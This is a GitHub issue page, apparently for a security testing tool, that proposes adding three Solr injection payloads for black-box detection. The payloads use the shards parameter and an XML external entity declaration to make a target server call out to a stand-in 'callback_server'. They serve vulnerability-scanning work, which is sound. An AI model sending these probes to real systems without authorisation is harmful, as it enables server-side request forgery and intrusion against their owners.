-
Notifications
You must be signed in to change notification settings - Fork 201
Open
Description
https://github.com/artsploit/solr-injection#black-box-detection
GET /xxx?q=aaa%26shards=http://callback_server/solr
GET /xxx?q=aaa&shards=http://callback_server/solr
GET /xxx?q={!type=xmlparser v="<!DOCTYPE a SYSTEM 'http://callback_server/solr'><a></a>"}
Solr is used a lot in underlying search/filtering technology, so I think these payloads should be tried in most forms, could lead to easy bugs.
Metadata
Metadata
Assignees
Labels
No labels